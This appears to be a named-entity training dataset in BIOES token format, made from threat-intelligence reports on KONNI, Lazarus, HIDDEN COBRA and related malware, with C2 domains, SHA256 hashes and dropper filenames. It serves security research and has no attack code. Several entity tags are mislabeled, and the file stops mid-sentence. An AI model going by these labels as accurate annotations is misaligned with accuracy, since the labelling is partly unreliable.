O + +The O +Advanced B-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +uncovered O +activity O +related O +to O +this O +campaign O +in O +March B-TIME +2018 E-TIME +, O +when O +the O +actors S-APT +targeted O +Turkish S-LOC +banks S-IDTY +. O + +KONNI S-MAL +: O +A O +Malware O +Under O +The O +Radar S-TOOL +For B-TIME +Years E-TIME +. O + + +Talos S-SECTEAM +has O +discovered O +an O +unknown O +Remote B-MAL +Administration I-MAL +Tool E-MAL +that O +we O +believe O +has O +been O +in O +use O +for O +over B-TIME +3 I-TIME +years E-TIME +. O + +During O +this O +time O +it O +has O +managed O +to O +avoid O +scrutiny O +by O +the O +security O +community O +. O + +The O +current O +version O +of O +the O +malware O +allows O +the O +operator O +to O +steal O +files O +, O +keystrokes O +, O +perform O +screenshots O +, O +and O +execute O +arbitrary O +code O +on O +the O +infected O +host O +. O + +Talos S-SECTEAM +has O +named O +this O +malware O +KONNI S-MAL +. O + +Throughout O +the O +multiple O +campaigns O +observed O +over O +the O +last O +3 O +years O +, O +the O +actor O +has O +used O +an O +email B-ACT +attachment E-ACT +as O +the O +initial O +infection O +vector O +. O + +They O +then O +use O +additional O +social O +engineering O +to O +prompt O +the O +target O +to O +open O +a O +.scr S-FILE +file O +, O +display O +a O +decoy O +document O +to O +the O +users O +, O +and O +finally O +execute O +the O +malware O +on O +the O +victim's O +machine O +. O + +The O +malware O +infrastructure O +of O +the O +analysed O +samples O +was O +hosted O +by O +a O +free O +web O +hosting O +provider: O +000webhost O +. O + +The O +malware O +has O +evolved O +over O +time O +. 
O + +In O +this O +article O +, O +we O +will O +analyse O +this O +evolution: O +at O +the O +beginning O +the O +malware O +was O +only O +an O +information O +stealer O +without O +remote O +administration O +, O +it O +moved O +from O +a O +single O +file O +malware O +to O +a O +dual O +file O +malware O +(an O +executable O +and O +a O +dynamic B-TOOL +library E-TOOL +) O +, O +the O +malware O +has O +supported O +more O +and O +more O +features O +over O +the O +time O +, O +the O +decoy O +documents O +have O +become O +more O +and O +more O +advanced O +. O + +The O +different O +versions O +contain O +copy/pasted O +code O +from O +previous O +versions O +. O + +Moreover O +the O +new O +version O +searches O +for O +files O +generated O +by O +previous O +versions O +. O + +This O +evolution O +is O +illustrated O +across O +4 O +campaigns S-ACT +: O +one O +in O +2014 S-TIME +, O +one O +in O +2016 S-TIME +and O +finally O +two O +in O +2017 S-TIME +. O + +The O +decoy O +document O +of O +the O +2 O +last O +campaigns S-ACT +suggests O +that O +the O +targets O +are O +public O +organisations O +. O + +Both O +documents O +contained O +email S-TOOL +addresses O +, O +phone O +numbers O +and O +contacts O +of O +members O +of O +official B-IDTY +organizations E-IDTY +such O +as O +United B-IDTY +Nations E-IDTY +, O +UNICEF S-IDTY +, O +and O +Embassies S-IDTY +linked O +to O +North B-LOC +Korea E-LOC +. O + +In O +this O +campaign O +, O +the O +dropper O +filename O +was O +beauty.scr S-FILE +. O + +Based O +on O +the O +compilation O +date O +of O +the O +two O +binaries O +, O +this O +campaign S-ACT +took O +place O +in O +September B-TIME +2014 E-TIME +. O + +Once O +executed O +, O +two O +files O +were O +dropped O +on O +the O +targeted O +system O +: O +a O +decoy O +document O +(a O +picture) O +and O +a O +fake O +svchost.exe S-FILE +binary O +. O + +Both O +files O +were O +stored O +in O +"C:\Windows" S-FILE +. 
O + +The O +fake O +svchost O +binary O +is O +the O +KONNI S-MAL +malware O +. O + +The O +first O +task O +of O +the O +malware O +is O +to O +generate O +an O +ID O +to O +identify O +the O +infected O +system O +. O + +This O +ID O +is O +generated O +based O +on O +the O +installation O +date O +of O +the O +system O +. O + +The O +second O +task O +of O +malware O +is O +to O +ping O +the O +CC O +and O +get O +orders O +. O + +The O +malware O +includes O +2 O +domains: O +phpschboy.prohosts.org S-DOM +, O +jams481.site.bz S-DOM +. O + +The O +developer O +used O +the O +Microsoft B-TOOL +Winsocks I-TOOL +API E-TOOL +to O +handle O +the O +network O +connection O +. O + +Surprisingly O +, O +this O +isn't O +the O +easiest O +or O +the O +most O +efficient O +technical O +choice O +for O +HTTP PROT +connection O +. O + +The O +malware O +samples O +we O +analysed O +connected O +to O +only O +one O +URI: O +/login.php S-DOM +. O + +This O +version O +of O +KONNI S-MAL +is O +not O +designed O +to O +execute O +code O +on O +the O +infected O +system O +. O + +The O +purpose O +is O +to O +be O +executed O +only O +once O +and O +steal O +data O +on O +the O +infected O +system O +, O +here O +are O +the O +main O +features O +: O +Keyloggers O +, O +Clipboard O +stealer O +, O +Firefox S-IDTY +profiles O +and O +cookies O +stealer O +, O +Chrome S-IDTY +profiles O +and O +cookies O +stealer O +, O +Opera S-IDTY +profiles O +and O +cookies O +stealer O +. O + +The O +name O +of O +the O +.scr S-FILE +file O +was O +directly O +linked O +to O +tension O +between O +North B-LOC +Korea E-LOC +and O +USA S-LOC +in O +March B-TIME +2016 E-TIME +more O +information O +. O + +Based O +on O +the O +compilation O +dates O +of O +the O +binaries O +, O +the O +campaign O +took O +place O +in O +the O +same O +period O +. 
O + +An O +interesting O +fact O +: O +the O +dropped O +library O +was O +compiled O +in O +2014 S-TIME +and O +appears O +in O +our O +telemetry O +in O +August B-TIME +2015 E-TIME +. O + +Indicating O +that O +this O +library O +was O +probably O +used O +in O +another O +campaign O +. O + +The O +.scr S-FILE +file O +contains O +2 O +Office S-TOOL +documents O +. O + +The O +first O +document O +was O +in O +English O +and O +a O +second O +in O +Russian O +. O + +In O +the O +sample O +only O +the O +English O +version O +can O +be O +displayed O +to O +the O +user O +(that O +is O +hardcoded O +in O +the O +sample) O +. O + +The O +Russian O +document O +is O +not O +used O +by O +the O +sample O +, O +we O +assume O +that O +the O +author O +of O +the O +malware O +forgot O +to O +remove O +the O +resource O +containing O +the O +Russia S-LOC +decoy O +document O +. O + +The O +malware O +author O +changed O +the O +malware O +architecture O +, O +this O +version O +is O +divided O +in O +two O +binaries: O +conhote.dll S-FILE +, O +winnit.exe S-FILE +. O + +Another O +difference O +is O +the O +directory O +where O +the O +files O +are O +dropped O +, O +it's O +no O +longer O +C:\Windows S-FILE +but O +rather O +the O +local O +setting O +of O +the O +current O +user O +(%USERPROFILE%\Local B-FILE +Settings\winnit\winnit.exe) E-FILE +. O + +Thanks O +to O +this O +modification O +, O +the O +malware O +can O +be O +executed O +with O +a O +non-administrator O +account O +. O + +The O +.dll S-FILE +file O +is O +executed O +by O +the O +.exe S-FILE +file O +. O + +In O +this O +version O +, O +a O +shortcut O +is O +created O +in O +order O +to O +launch O +winnit.exe S-FILE +in O +the O +following O +path O +%USERPROFILE%\Start B-FILE +Menu\Programs\Startup\Anti I-FILE +virus I-FILE +service.lnk E-FILE +. 
O + +As O +you O +can O +see O +the O +attacker O +has O +went O +to O +great O +lengths O +to O +disguise O +his O +service O +as O +a O +legitimate O +Antivirus B-TOOL +Service E-TOOL +by O +using O +the O +name O +'Anti B-FILE +virus I-FILE +service.lnk' E-FILE +. O + +This O +is O +of O +course O +simple O +but O +often O +it O +can O +be O +enough O +for O +a O +user O +to O +miss O +something O +malicious O +by O +name O +. O + +As O +in O +the O +previous O +version O +, O +the O +ID O +of O +the O +infected O +system O +is O +generated O +with O +exactly O +the O +same O +method O +. O + +The O +C2 S-TOOL +is O +different O +and O +the O +analysed O +version O +this O +time O +only O +contains O +a O +single O +domain: O +dowhelsitjs.netau.net S-DOM +. O + +In O +this O +version O +, O +the O +developer O +used O +a O +different O +API O +, O +the O +Wininet B-TOOL +API E-TOOL +which O +make O +more O +sense O +for O +Web O +requests O +. O + +Moreover O +the O +C2 S-TOOL +infrastructure O +evolved O +too O +, O +more O +.php S-FILE +files O +are O +available O +through O +the O +web O +hosting: O +/login.php S-FILE +/upload.php S-FILE +/download.php S-FILE +. O + +This O +version O +includes O +the O +stealer O +features O +mentioned O +in O +the O +previous O +version O +and O +additionally O +Remote B-TOOL +Administration I-TOOL +Tool E-TOOL +features O +such O +as O +file O +uploading/download O +and O +arbitrary O +command O +execution O +. O + +The O +library O +is O +only O +used O +to O +perform O +keylogging O +and O +clipboard O +stealing O +. O + +Indeed O +, O +the O +malware O +author O +moved O +this O +part O +of O +the O +code O +from O +the O +core O +of O +the O +malware O +to O +a O +library O +. O + +An O +interesting O +element O +is O +that O +the O +malware O +looks O +for O +filenames O +created O +with O +the O +previous O +version O +of O +KONNI S-MAL +. 
O + +This O +implies O +that O +the O +malware O +targeted O +the O +same O +people O +as O +the O +previous O +version O +and O +they O +are O +designed O +to O +work O +together O +. O + +The O +malware O +internally O +uses O +the O +following O +files O +: O +solhelp.ocx S-FILE +sultry.ocx S-FILE +helpsol.ocx S-FILE +psltre.ocx S-FILE +screentmp.tmp S-FILE +(log O +file O +of O +the O +keylogger) O +spadmgr.ocx S-FILE +apsmgrd.ocx S-FILE +wpg.db S-FILE +. O + +In O +this O +campaign O +, O +the O +malware O +author O +uses O +the O +following O +name: O +Pyongyang B-ACT +Directory I-ACT +Group I-ACT +email E-ACT +April B-TIME +2017 E-TIME +RC_Office_Coordination_Associate.scr. S-FILE +The O +decoy O +document O +shown O +after O +infection O +is O +an O +Office S-TOOL +document O +containing O +email S-TOOL +addresses O +, O +phone O +numbers O +and O +contacts O +of O +members O +of O +official B-IDTY +organizations E-IDTY +such O +as O +the O +United B-IDTY +Nations E-IDTY +, O +UNICEF S-IDTY +, O +Embassies S-IDTY +linked O +to O +North B-LOC +Korea E-LOC +. O + +The O +.scr S-FILE +files O +drops O +two O +files: O +an O +executable O +and O +a O +library O +. O + +As O +in O +the O +previous O +version O +, O +the O +persistence O +is O +achieved O +by O +a O +Windows S-OS +shortcut O +(in O +this O +case O +adobe O +distillist.lnk S-FILE +) O +. O + +Contrary O +to O +the O +previous O +version O +, O +the O +developers O +moved O +the O +core O +of O +malware O +to O +the O +library O +. O + +The O +executable O +performs O +the O +following O +tasks: O +If O +the O +system O +is O +a O +64-bit O +version O +of O +Windows S-OS +, O +it O +downloads O +and O +executes O +a O +specific O +64-bit O +version O +of O +the O +malware O +thanks O +to O +a O +powershell S-TOOL +script O +. O + +Loading O +the O +dropped O +library O +. 
O + +The O +library O +contains O +the O +same O +features O +as O +the O +previous O +version O +as O +well O +as O +new O +ones O +. O + +This O +version O +of O +KONNI S-MAL +is O +the O +most O +advanced O +with O +better O +coding O +. O + +The O +malware O +configuration O +contains O +one O +Command O +and O +Control: O +pactchfilepacks.net23.net S-DOM +. O + +A O +new O +URI O +is O +available: O +/uploadtm.php S-DOM +. O + +This O +URI O +is O +used O +with O +a O +new O +feature O +implemented O +in O +this O +version: O +the O +malware O +is O +able O +to O +perform O +screenshot O +(thanks O +to O +the O +GDI O +API) O +and O +uploads O +it O +thank O +to O +this O +URL O +. O + +The O +malware O +checks O +if O +a O +file O +used O +on O +a O +previous O +version O +of O +KONNI S-MAL +is O +available O +on O +the O +system O +. O + +Here O +is O +the O +complete O +list O +of O +files O +internally O +used O +by O +the O +RAT: O +error.tmp S-FILE +(the O +log O +file O +of O +the O +keylogger) O +tedsul.ocx S-FILE +helpsol.ocx S-FILE +trepsl.ocx S-FILE +psltred.ocx S-FILE +solhelp.ocx S-FILE +sulted.ocx S-FILE +. O + +The O +handling O +of O +instructions O +has O +improved O +too O +. O + +Here O +are O +the O +7 O +actions O +that O +the O +infected O +machine O +can O +be O +instructed O +to O +perform: O +Delete O +a O +specific O +file O +. O + +Upload O +a O +specific O +file O +based O +on O +a O +filename O +. O + +Upload O +a O +specific O +file O +based O +on O +the O +full O +path O +name O +. O + +Create O +a O +screenshot O +and O +uploads O +it O +on O +the O +C2 S-TOOL +. O + +Get O +system O +information O +. O + +Download O +a O +file O +from O +the O +Internet O +. O + +Execute O +a O +command O +. 
O + +When O +the O +attacker O +wants O +to O +gather O +information O +on O +the O +infected O +system O +(action O +5) O +, O +it O +retrieves O +the O +following O +information: O +Hostname O +IP O +address O +Computer O +name O +Username O +name O +Connected O +drive O +OS O +version O +Architecture O +Start O +menu O +programs O +Installed O +software O +. O + +The O +last O +identified O +campaign O +where O +KONNI S-MAL +was O +used O +was O +named O +Inter B-ACT +Agency I-ACT +List I-ACT +and I-ACT +Phonebook E-ACT +- O +April B-TIME +2017 E-TIME +RC_Office_Coordination_Associate.scr S-FILE +. O + +This O +file O +drops O +exactly O +the O +same O +files O +than O +the O +previous O +campaign O +but O +the O +decoy O +document O +is O +different O +. O + +This O +document O +contains O +the O +name O +, O +phone O +number O +and O +email S-TOOL +address O +of O +members O +of O +agencies O +, O +embassies O +and O +organizations O +linked O +to O +North B-LOC +Korea E-LOC +. O + +The O +analysis O +shows O +us O +the O +evolution O +of O +KONNI S-MAL +over O +the O +last O +3 O +years O +. O + +The O +last O +campaign O +was O +started O +a O +few O +days O +ago O +and O +is O +still O +active O +. O + +The O +infrastructure O +remains O +up O +and O +running O +at O +the O +time O +of O +this O +post O +. O + +The O +RAT O +has O +remained O +under O +the O +Radar S-TOOL +for O +multiple O +years O +. O + +An O +explanation O +could O +be O +the O +fact O +that O +the O +campaign O +was O +very O +limited O +nature O +, O +which O +does O +not O +arouse O +suspicion O +. O + +This O +investigation O +shows O +that O +the O +author O +has O +evolved O +technically O +(by O +implementing O +new O +features) O +and O +in O +the O +quality O +of O +the O +decoy O +documents O +. O + +The O +campaign O +of O +April B-TIME +2017 E-TIME +used O +pertinent O +documents O +containing O +potentially O +sensitive O +data O +. 
O + +Moreover O +the O +metadata O +of O +the O +Office S-TOOL +document O +contains O +the O +names O +of O +people O +who O +seems O +to O +work O +for O +a O +public O +organization O +. O + +We O +don't O +know O +if O +the O +document O +is O +a O +legitimate O +compromised O +document O +or O +a O +fake O +that O +the O +attacker O +has O +created O +in O +an O +effort O +to O +be O +credible O +. O + +Clearly O +the O +author O +has O +a O +real O +interest O +in O +North B-LOC +Korea E-LOC +, O +with O +3 O +of O +the O +4 O +campaigns O +are O +linked O +to O +North B-LOC +Korea E-LOC +. O + +Additional O +ways O +our O +customers O +can O +detect O +and O +block O +this O +threat O +are O +listed O +below O +. O + +Advanced B-TOOL +Malware I-TOOL +Protection E-TOOL +( O +AMP S-TOOL +) O +is O +ideally O +suited O +to O +prevent O +the O +execution O +of O +the O +malware O +used O +by O +these O +threat O +actors O +. O + +CWS S-TOOL +or O +WSA S-TOOL +web O +scanning O +prevents O +access O +to O +malicious O +websites O +and O +detects O +malware O +used O +in O +these O +attacks O +. O + +Email B-TOOL +Security E-TOOL +can O +block O +malicious O +emails S-TOOL +sent O +by O +threat O +actors O +as O +part O +of O +their O +campaign O +. O + +The O +Network B-SECTEAM +Security E-SECTEAM +protection O +of O +IPS S-TOOL +and O +NGFW S-TOOL +have O +up-to-date O +signatures O +to O +detect O +malicious O +network O +activity O +by O +threat O +actors O +. O + +AMP B-SECTEAM +Threat I-SECTEAM +Grid E-SECTEAM +helps O +identify O +malicious O +binaries O +and O +build O +protection O +into O +all O +Cisco B-SECTEAM +Security E-SECTEAM +products O +. O + +Umbrella S-SECTEAM +, O +our O +secure O +internet O +gateway O +(SIG) O +, O +blocks O +users O +from O +connecting O +to O +malicious O +domains O +, O +IPs O +, O +and O +URLs O +, O +whether O +users O +are O +on O +or O +off O +the O +corporate O +network O +. 
O + +SHA256 S-ENCR +: O +413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f S-SHA2 +. O + +Filename: O +beauty.scr S-FILE +. O + +SHA256 S-ENCR +: O +eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 S-SHA2 +. O + +Filename: O +C:\Windows\beauty.jpg S-FILE +. O + +File O +type: O +JPEG O +image O +data O +, O +JFIF O +standard O +1.02 O +. O + +SHA256 S-ENCR +: O +44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9 S-SHA2 +. O + +Hilename: O +C:\Windows\svchost.exe S-FILE +. O + +File O +type: O +PE32 O +executable O +(GUI) O +Intel O +80386 O +, O +for O +MS B-IDTY +Windows E-IDTY +. O + +phpschboy.prohosts.org S-DOM +. O + +jams481.site.bz S-DOM +. O + +SHA256 S-ENCR +: O +94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 S-SHA2 +. O + +Filename: O +How B-FILE +can I-FILE +North I-FILE +Korean I-FILE +hydrogen I-FILE +bomb I-FILE +wipe I-FILE +out I-FILE +Manhattan.scr E-FILE +. O + +SHA256 S-ENCR +: O +56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 S-SHA2 +. O + +Filename: O +conhote.dll S-FILE +. O + +SHA256 S-ENCR +: O +553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc S-SHA2 +. O + +Filename: O +winnit.exe S-FILE +. O + +SHA256 S-ENCR +: O +92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f S-SHA2 +. O + +Filename: O +Anti B-FILE +virus I-FILE +service.lnk E-FILE +. O +dowhelsitjs.netau.net S-DOM +. O + +SHA256 S-ENCR +: O +69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 S-SHA2 +. O + +Filename: O +Pyongyang B-FILE +Directory I-FILE +Group I-FILE +email I-FILE +April I-FILE +2017.RC_Office_Coordination_Associate.scr E-FILE +. O + +SHA256 S-ENCR +: O +4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b S-SHA2 +. O + +Filename: O +adobe B-FILE +distillist.lnk E-FILE +. O + +SHA256 S-ENCR +: O +39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 S-SHA2 +. O + +Filename: O +winload.exe S-FILE +. 
O + +SHA256 S-ENCR +: O +dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d S-SHA2 +. O + +Filename: O +winload.dll S-FILE +. O + +Pactchfilepacks.net23.net S-DOM +. O +checkmail.phpnet.us S-DOM +. O + +Lazarus S-APT +used O +watering B-ACT +hole I-ACT +attacks E-ACT +to O +compromise O +legitimate O +and O +trusted O +websites O +frequently O +visited O +by O +their O +targets O +. O + +Malefactors S-APT +used O +watering B-ACT +hole I-ACT +attacks E-ACT +to O +compromise O +legitimate O +and O +trusted O +websites O +frequently O +visited O +by O +their O +targets O +. O + +Feedback O +from O +our O +Smart B-SECTEAM +Protection I-SECTEAM +Network E-SECTEAM +revealed O +that O +apart O +from O +attacks O +in O +North B-LOC +America E-LOC +( O +mainly O +the O +U.S. S-LOC +) O +, O +Europe S-LOC +, O +and O +South B-LOC +America E-LOC +, O +the O +campaign O +also O +noticeably O +affected O +enterprises S-IDTY +in O +Taiwan S-LOC +, O +Hong B-LOC +Kong E-LOC +, O +China S-LOC +, O +and O +Bahrain S-LOC +. O + +On O +February B-TIME +28 E-TIME +, O +the O +McAfee S-SECTEAM +discovered O +that O +the O +cybercrime O +group O +HIDDEN B-APT +COBRA E-APT +continues O +to O +target O +cryptocurrency S-IDTY +and O +financial B-IDTY +organizations E-IDTY +. O + +On O +February B-TIME +28 E-TIME +, O +the O +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +discovered O +that O +the O +cybercrime O +group O +HIDDEN B-APT +COBRA E-APT +continues O +to O +target O +cryptocurrency S-IDTY +and O +financial B-IDTY +organizations E-IDTY +. O + +While O +the O +URL O +acts O +similarly O +to O +how O +eye-watch.in O +: O +443 O +delivers O +payloads O +, O +we O +also O +saw O +the O +URL O +leveraging O +and O +exploiting O +security O +flaws O +in O +Flash S-TOOL +: O +CVE-2015-8651 S-VULID +, O +CVE-2016-1019 S-VULID +, O +and O +CVE-2016-4117 S-VULID +. 
O + +In O +this O +analysis O +, O +we O +observed O +the O +return O +of O +HIDDEN B-APT +COBRA E-APT +'s O +Bankshot S-MAL +malware S-MAL +implant O +surfacing O +in O +the O +Turkish S-LOC +financial O +system O +. O + +In O +this O +new O +, O +aggressive O +campaign O +we O +see O +a O +return O +of O +the O +Bankshot S-MAL +implant O +, O +which O +last O +appeared O +in O +2017 S-TIME +. O + +This O +attack O +resembles O +previous O +attacks O +by O +HIDDEN B-APT +COBRA E-APT +conducted O +against O +the O +SWIFT O +. O + +The O +exploit S-VULNAME +, O +which O +takes O +advantage O +of O +CVE-2018-4878 S-VULID +, O +allows O +an O +attacker S-APT +to O +execute O +arbitrary O +code O +such O +as O +an O +implant O +. O + +These O +implants O +are O +variations O +of O +earlier O +forms O +of O +Bankshot S-MAL +, O +a O +remote O +access O +tool O +that O +gives O +an O +attacker S-APT +full O +capability O +on O +a O +victim O +'s O +system O +. O + +Bankshot S-MAL +was O +first O +reported O +by O +the O +Department B-SECTEAM +of I-SECTEAM +Homeland I-SECTEAM +Security E-SECTEAM +on O +December B-TIME +13 I-TIME +, I-TIME +2017 E-TIME +, O +and O +has O +only O +recently O +resurfaced O +in O +newly O +compiled O +variants O +. O + +We O +have O +found O +what O +may O +be O +an O +early O +data-gathering O +stage O +for O +future O +possible O +heists O +from O +financial B-IDTY +organizations E-IDTY +in O +Turkey S-LOC +( O +and O +possibly O +other O +countries O +) O +. O + +Documents S-FILE +with O +the O +flash S-TOOL +exploit S-VULNAME +managed O +to O +evade O +static O +defenses O +and O +remain O +undetected O +as O +an O +exploit S-VULNAME +on O +VirusTotal S-TOOL +. O + +This O +malware O +report O +contains O +analysis O +of O +one O +32-bit B-FILE +Windows I-FILE +executable I-FILE +file E-FILE +, O +identified O +as O +a O +Remote B-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. 
O + +This O +malware O +is O +capable O +of O +accessing O +device O +configuration O +data O +, O +downloading O +additional O +files O +, O +executing O +commands O +, O +modifying O +the O +registry O +, O +capturing O +screen O +shots O +, O +and O +exfiltrating O +data O +. O + +Volgmer S-MAL +is O +a O +backdoor B-MAL +Trojan E-MAL +designed O +to O +provide O +covert O +access O +to O +a O +compromised O +system O +. O + +It O +is O +suspected O +that O +spear B-ACT +phishing E-ACT +is O +the O +primary O +delivery O +mechanism O +for O +Volgmer S-MAL +infections O +; O +however O +, O +HIDDEN B-APT +COBRA I-APT +actors E-APT +use O +a O +suite O +of O +custom B-MAL +tools E-MAL +, O +some O +of O +which O +could O +also O +be O +used O +to O +initially O +compromise O +a O +system O +. O + +Since O +at O +least O +2013 S-TIME +, O +HIDDEN B-APT +COBRA I-APT +actors E-APT +have O +been O +observed O +using O +Volgmer S-MAL +malware S-MAL +in O +the O +wild O +to O +target O +the O +government S-IDTY +, O +financial S-IDTY +, O +automotive S-IDTY +, O +and O +media B-IDTY +industries E-IDTY +. O + +Therefore O +, O +it O +is O +possible O +that O +additional O +HIDDEN B-MAL +COBRA I-MAL +malware E-MAL +may O +be O +present O +on O +network B-ACT +infrastructure E-ACT +compromised O +with O +Volgmer S-MAL +. O + +As O +a O +backdoor B-MAL +Trojan E-MAL +, O +Volgmer S-MAL +has O +several O +capabilities O +including O +: O +gathering O +system O +information O +, O +updating O +service O +registry O +keys O +, O +downloading O +and O +uploading O +files O +, O +executing O +commands O +, O +terminating O +processes O +, O +and O +listing O +directories O +. O + +In O +one O +of O +the O +samples O +received O +for O +analysis O +, O +the O +US-CERT B-SECTEAM +Code I-SECTEAM +Analysis I-SECTEAM +Team E-SECTEAM +observed O +botnet B-FILE +controller E-FILE +functionality O +. 
O + +Volgmer S-MAL +payloads O +have O +been O +observed O +in O +32-bit O +form O +as O +either O +executables O +or O +dynamic-link B-TOOL +library E-TOOL +( O +.dll S-FILE +) O + + +Lazarus B-APT +actors E-APT +commonly O +maintain O +persistence O +on O +a O +victim O +'s O +system O +by O +installing O +the O +malware-as-a-service S-ACT +. O + +Working O +with O +U.S. B-IDTY +Government E-IDTY +partners O +, O +DHS S-SECTEAM +and O +FBI S-SECTEAM +identified O +Trojan S-MAL +malware S-MAL +variants O +used O +by O +the O +North B-LOC +Korean E-LOC +government O +- O +referred O +to O +by O +the O +U.S. B-IDTY +Government E-IDTY +as O +BADCALL O +. O + +The O +malware O +uses O +a O +custom B-MAL +binary I-MAL +protocol E-MAL +to O +beacon S-MAL +back O +to O +the O +command O +and O +control O +( O +C2 S-TOOL +) O +server O +, O +often O +via O +TCP S-PROT +PROT O +8080 O +or O +8088 O +, O +with O +some O +payloads O +implementing O +Secure B-PROT +Socket I-PROT +Layer E-PROT +( O +SSL S-PROT +) O +encryption O +to O +obfuscate O +communications S-IDTY +. O + +DHS S-SECTEAM +and O +FBI S-SECTEAM +are O +distributing O +this O +MAR O +to O +enable O +network O +defense O +and O +reduce O +exposure O +to O +North B-LOC +Korean E-LOC +government O +malicious B-ACT +cyber I-ACT +activity E-ACT +. O + +The O +malware O +known O +as O +RATANKBA S-MAL +is O +just O +one O +of O +the O +weapons O +in O +Lazarus S-APT +' O +arsenal O +. O + +We O +analyzed O +a O +new O +RATANKBA S-MAL +variant O +( O +BKDR_RATANKBA.ZAEL–A S-MAL +) O +, O +discovered O +in O +June B-TIME +2017 E-TIME +, O +that O +uses O +a O +PowerShell B-MAL +script E-MAL +instead O +of O +its O +more O +traditional O +PE O +executable O +form—a O +version O +that O +other O +researchers O +also O +recently O +identified O +. O + +Around O +55% O +of O +the O +victims O +of O +Lazarus S-APT +were O +located O +in O +India S-LOC +and O +neighboring O +countries O +. 
O + +Lazarus B-APT +group E-APT +could O +have O +been O +active O +since O +late B-TIME +2016 E-TIME +, O +was O +used O +in O +a O +recent O +campaign O +targeting O +financial B-IDTY +institutions E-IDTY +using O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +Since O +they O +first O +emerged O +back O +in O +2007 S-TIME +with O +a O +series O +of O +cyberespionage B-ACT +attacks E-ACT +against O +the O +South B-LOC +Korean E-LOC +government S-IDTY +, O +these O +threat O +actors S-APT +have O +successfully O +managed O +to O +pull O +off O +some O +of O +the O +most O +notable O +and O +devastating O +targeted O +attacks—such O +as O +the O +widely-reported O +2014 S-TIME +Sony O +hack O +and O +the O +2016 B-ACT +attack E-ACT +on O +a O +Bangladeshi S-LOC +bank—in O +recent O +history O +. O + +It O +'s O +possible O +that O +Lazarus S-APT +is O +using O +RATANKBA S-MAL +to O +target O +larger O +organizations O +. O + +RATANKBA S-MAL +is O +delivered O +to O +its O +victims O +using O +a O +variety O +of O +lure O +documents O +, O +including O +Microsoft B-MAL +Office I-MAL +documents E-MAL +, O +malicious O +CHM B-MAL +files E-MAL +, O +and O +different O +script O +downloaders O +. O + +Overall O +, O +an O +organization O +will O +need O +multilayered O +security O +strategies O +, O +as O +Lazarus S-APT +and O +other O +similar O +groups S-APT +are O +experienced O +cybercriminals S-APT +who O +employ O +different O +strategies O +to O +get O +past O +organizational O +defenses O +. O + +simultaneous O +use O +of O +the O +detected O +Win32/KillDisk.NBO S-MAL +variants O +. O + +Working O +with O +U.S. B-IDTY +Government E-IDTY +partners O +, O +DHS S-SECTEAM +and O +FBI S-SECTEAM +identified O +Trojan S-MAL +malware S-MAL +variants O +used O +by O +the O +North B-LOC +Korean E-LOC +government O +– O +commonly O +known O +as O +HARDRAIN S-MAL +. 
O + +These O +files O +have O +the O +capability O +to O +download O +and O +install O +malware O +, O +install O +proxy O +and O +Remote O +Access O +Trojans O +( O +RATs S-MAL +) O +, O +connect O +to O +command O +and O +control O +( O +C2 S-TOOL +) O +servers O +to O +receive O +additional O +instructions O +, O +and O +modify O +the O +victim O +'s O +firewall O +to O +allow O +incoming O +connections O +. O + +The O +cybercriminal O +group O +Lazarus S-APT +has O +a O +history O +of O +attacking O +financial B-IDTY +organizations E-IDTY +in O +Asia S-LOC +and O +Latin B-LOC +America E-LOC +. O + +We O +also O +recently O +discovered O +that O +Lazarus S-APT +successfully O +planted O +their O +backdoor O +( O +detected O +by O +Trend B-SECTEAM +Micro E-SECTEAM +as O +BKDR_BINLODR.ZNFJ-A S-MAL +) O +into O +several O +machines O +of O +financial B-IDTY +institutions E-IDTY +across O +Latin B-LOC +America E-LOC +. O + +We O +determined O +that O +these O +backdoors O +were O +installed O +on O +the O +targets O +' O +machines O +on O +September B-TIME +19 I-TIME +2018 E-TIME +, O +based O +mainly O +on O +the O +service O +creation O +time O +of O +the O +loader O +component O +. O + +Just O +last O +week O +Lazarus S-APT +were O +found O +stealing O +millions O +from O +ATMs O +across O +Asia S-LOC +and O +Africa S-LOC +. O + +These O +and O +other O +tools O +used O +by O +the O +Lazarus B-APT +group E-APT +can O +be O +mitigated O +by O +routinely O +scanning O +the O +network O +for O +any O +malicious B-ACT +activity E-ACT +to O +help O +prevent O +the O +malware O +from O +entering O +and O +spreading O +through O +an O +organization O +. 
O + +The O +backdoors O +Lazarus S-APT +are O +deploying O +are O +difficult O +to O +detect O +and O +a O +significant O +threat O +to O +the O +privacy O +and O +security O +of O +enterprises S-IDTY +, O +allowing O +attackers S-APT +to O +steal O +information O +, O +delete O +files O +, O +install O +malware O +, O +and O +more O +. O + +Trend B-SECTEAM +Micro E-SECTEAM +endpoint O +solutions O +such O +as O +Trend B-SECTEAM +Micro™ I-SECTEAM +Smart I-SECTEAM +Protection I-SECTEAM +Suites E-SECTEAM +and O +Worry-Free™ B-SECTEAM +Business I-SECTEAM +Security E-SECTEAM +can O +protect O +users O +and O +businesses S-IDTY +from O +these O +threats O +by O +detecting O +malicious B-FILE +files E-FILE +and O +spammed O +messages O +as O +well O +as O +blocking O +all O +related O +malicious O +URLs O +. O + +FBI S-SECTEAM +has O +high O +confidence O +that O +HIDDEN B-APT +COBRA I-APT +actors E-APT +are O +using O +malware O +variants O +in O +conjunction O +with O +proxy O +servers O +to O +maintain O +a O +presence O +on O +victim O +networks O +and O +to O +further O +network O +exploitation O +. O + +Ransomware O +that O +has O +been O +publicly O +named O +" O +WannaCry S-MAL +" O +, O +" O +WCry S-MAL +" O +or O +" O +WanaCrypt0r S-MAL +" O +( O +based O +on O +strings O +in O +the O 